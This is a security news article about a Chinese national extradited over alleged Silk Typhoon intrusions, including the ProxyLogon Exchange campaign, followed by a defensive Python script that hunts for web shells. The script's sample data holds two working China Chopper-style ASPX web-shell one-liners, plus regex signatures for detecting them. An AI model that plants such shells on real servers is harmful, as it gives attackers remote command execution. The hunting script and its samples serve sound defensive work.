A Chinese national accused of working as a contract hacker for China's Ministry of State Security has been extradited from Italy to the United States, where he faces federal charges tied to a years-long cyberespionage campaign attributed to the Silk Typhoon group. According to the Department of Justice, Xu Zewei conducted intrusions between February 2020 and June 2021, including attacks on COVID-19 research organizations and the mass exploitation of Microsoft Exchange Server zero-days that compromised thousands of organizations worldwide.

What Happened

Xu Zewei was arrested in Milan in July 2025 at the request of U.S. authorities and has now been transferred to American custody to face charges that include wire fraud, conspiracy, unauthorized access to protected computers, and aggravated identity theft. Prosecutors allege Xu operated under the direction of officers from the MSS Shanghai State Security Bureau (SSSB) while employed at Shanghai Powerock Network Co., Ltd., a private firm the DOJ describes as one of many nominally private companies that carry out hacking on behalf of the PRC state. The indictment links Xu directly to activity attributed to Silk Typhoon, the cluster Microsoft previously tracked as Hafnium, the Chinese state-aligned group responsible for some of the most consequential intrusions of the past five years, including the 2021 mass exploitation of Exchange Server.

What Was Taken

The DOJ alleges Xu and his co-conspirators targeted U.S. universities and research institutions working on COVID-19 vaccines, treatments, and testing, exfiltrating sensitive biomedical research data during the early pandemic. Separately, the 2021 Exchange Server campaign tied to the same actors enabled mass theft of corporate and government email, contact databases, and internal correspondence from victim mailboxes. Once inside networks, the attackers performed reconnaissance, deployed malware, and staged data for exfiltration, with thousands of organizations globally caught in the wider Hafnium sweep.

Why It Matters

This extradition is one of the few times a named operator inside a Chinese state-aligned hacking program has been brought into a U.S. courtroom, and the unsealed allegations put on the public record, in the government's own words, what threat researchers have long assessed: that the MSS contracts intrusion work to nominally private Chinese firms like Powerock, gaining a layer of plausible deniability while still directing targeting and tasking. These are allegations, not findings, but for defenders the case crystallizes the operational model behind Silk Typhoon and similar clusters, where commercial hacking contractors execute campaigns aligned with PRC intelligence priorities ranging from public health research to enterprise email compromise. It also signals continued willingness by Western governments to pursue extraditions of Chinese contractors caught traveling abroad.

The Attack Technique

Silk Typhoon's tradecraft during the indicted window centered on opportunistic exploitation of internet-facing systems, most notoriously the chain of Microsoft Exchange zero-days disclosed in March 2021 (ProxyLogon: the CVE-2021-26855 server-side request forgery used to bypass authentication, chained with CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, the last of which allowed writing arbitrary files to the server). After breaching vulnerable Exchange servers, the operators wrote ASPX web shells into web-accessible directories such as the OWA and ECP auth folders; those shells gave persistent, unauthenticated command execution on the server, which in turn enabled mailbox access, lateral movement, and bulk data exfiltration. The campaign accelerated sharply in late February and early March 2021, around Microsoft's out-of-band patch release, as the actors raced to compromise as many servers as possible before defenders could patch. Earlier 2020 intrusions against COVID-19 research targets relied on similar perimeter exploitation followed by reconnaissance and malware deployment inside victim networks.

What Organizations Should Do

  1. Audit all internet-facing Exchange, Citrix, Ivanti, and similar appliances for unpatched vulnerabilities and known Silk Typhoon/Hafnium IOCs, including legacy web shells that may have persisted since 2021.
  2. Hunt retrospectively for China Chopper, Awen, and other web shells associated with the ProxyLogon campaign in archived web server logs and unmonitored DMZ hosts.
  3. Apply strict egress filtering and TLS inspection on perimeter systems to detect data staging and exfiltration to attacker-controlled infrastructure.
  4. Treat biomedical, pharmaceutical, and dual-use research environments as priority targets and segregate them from general enterprise networks with dedicated monitoring.
  5. Map the TTPs of PRC state-aligned clusters (Silk Typhoon and Salt Typhoon, both assessed as MSS-linked, and Volt Typhoon, assessed as PLA-linked) into detection engineering backlogs, prioritizing initial-access exploitation of edge devices over endpoint-only coverage.
  6. Review incident response retainers and legal escalation paths for handling state-sponsored intrusions, including coordination with FBI field offices and CISA.
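Items 1 and 2 above describe a retrospective web shell hunt. The script below is an added example written for this page, not code from the DOJ filing or from any vendor's IOC package; it runs offline against archived IIS W3C logs and copies of files pulled from an Exchange server's web roots, which is how such a hunt is usually done after the fact. It performs two checks: a content scan of .aspx files for the China Chopper one-liner shape (a request parameter passed straight to `eval` with the JScript `"unsafe"` flag) and a log scan for POST requests to .aspx pages in the directories where the 2021 campaign dropped shells that are not in a known-good allowlist. The signature set, the `SHELL_DIRS` and `KNOWN_GOOD` lists, and all sample file contents and log lines are constructed assumptions for illustration; build the allowlist from a known-clean server on the same cumulative update before trusting the results.

```python
"""Offline hunt for ProxyLogon-era web shells on Exchange/IIS hosts.

Check 1: scan .aspx file contents for request-parameter-to-eval shells.
Check 2: scan IIS W3C logs for POSTs to unexpected .aspx pages under the
         directories the 2021 campaign wrote shells into.

Signatures, directory lists and samples are the author's assumptions,
not a vendor-published IOC set. Tune against your own baseline.
"""
import re
from dataclasses import dataclass

# Web-root directories where 2021 Exchange intrusions commonly dropped shells (assumed).
SHELL_DIRS = ("/owa/auth/", "/ecp/auth/", "/aspnet_client/")

# Legitimate pages that receive POSTs under those paths (assumed baseline;
# extend from a known-clean server of the same CU before relying on it).
KNOWN_GOOD = {"/owa/auth/logon.aspx", "/owa/auth/errorfe.aspx"}

# Content patterns: request parameter fed straight to eval (China Chopper shape),
# the JScript "unsafe" eval flag, and process-spawning helpers (weak, noisy indicator).
CONTENT_SIGS = {
    "chopper_eval_request": re.compile(r"eval\s*\(\s*Request\s*\.\s*Item\s*\[", re.I),
    "eval_request_indexer": re.compile(r"eval\s*\(\s*Request\s*\[", re.I),
    "jscript_unsafe_eval": re.compile(r'"unsafe"\s*\)', re.I),
    "process_start": re.compile(r"Process\s*\.\s*Start|ProcessStartInfo", re.I),
}


def scan_content(path, text):
    """Return the names of the content signatures that fire on one file's text."""
    return [name for name, rx in CONTENT_SIGS.items() if rx.search(text)]


@dataclass
class Req:
    date: str
    time: str
    method: str
    path: str
    status: str
    ip: str


def parse_iis_log(text):
    """Parse IIS W3C extended log text using the #Fields header it carries."""
    fields, out = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        out.append(Req(rec["date"], rec["time"], rec["cs-method"],
                       rec["cs-uri-stem"].lower(), rec["sc-status"], rec["c-ip"]))
    return out


def suspicious_requests(reqs):
    """POSTs to .aspx pages under shell-drop directories that are not known-good."""
    return [r for r in reqs
            if r.method == "POST" and r.path.endswith(".aspx")
            and r.path.startswith(SHELL_DIRS) and r.path not in KNOWN_GOOD]


def hunt(files, log_text):
    """Run both checks. files: {path: contents}. Returns hits from each check."""
    file_hits = {p: sigs for p, t in files.items() if (sigs := scan_content(p, t))}
    req_hits = [(r.ip, r.path) for r in suspicious_requests(parse_iis_log(log_text))]
    return {"files": file_hits, "requests": req_hits}


# Constructed sample data: two planted shells, one benign page, five log lines.
SAMPLE_FILES = {
    "wwwroot/aspnet_client/system_web/discover.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["orange"],"unsafe");}</script>',
    "FrontEnd/HttpProxy/owa/auth/help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "FrontEnd/HttpProxy/owa/auth/logon.aspx":
        '<%@ Page Language="C#" %><html><body>Sign in</body></html>',
}

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2021-03-03 04:12:01 10.0.0.5 GET /owa/auth/logon.aspx - 443 203.0.113.7 Mozilla/5.0 200
2021-03-03 04:12:09 10.0.0.5 POST /owa/auth/logon.aspx - 443 203.0.113.7 Mozilla/5.0 302
2021-03-03 04:13:40 10.0.0.5 POST /owa/auth/help.aspx - 443 198.51.100.22 python-requests/2.25.1 200
2021-03-03 04:13:41 10.0.0.5 POST /aspnet_client/system_web/discover.aspx - 443 198.51.100.22 python-requests/2.25.1 200
2021-03-03 04:15:00 10.0.0.5 GET /ecp/default.aspx - 443 203.0.113.9 Mozilla/5.0 200
"""

if __name__ == "__main__":
    result = hunt(SAMPLE_FILES, SAMPLE_LOG)
    for path, sigs in result["files"].items():
        print(f"FILE  {path}: {', '.join(sigs)}")
    for ip, path in result["requests"]:
        print(f"LOG   POST {path} from {ip}")
```

The two checks are meant to corroborate each other: a POST to an unexpected .aspx page is a lead, and a matching file hit on disk (or a file that has since been deleted, which is itself worth noting) turns it into an incident. The `process_start` signature fires on some legitimate administrative pages, so treat it as context rather than a verdict, and do not rely on this script alone, since shells from the 2021 campaign were also obfuscated or written as compiled assemblies that a text signature will not catch.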

Sources: Alleged Silk Typhoon hacker extradited to US for cyberespionage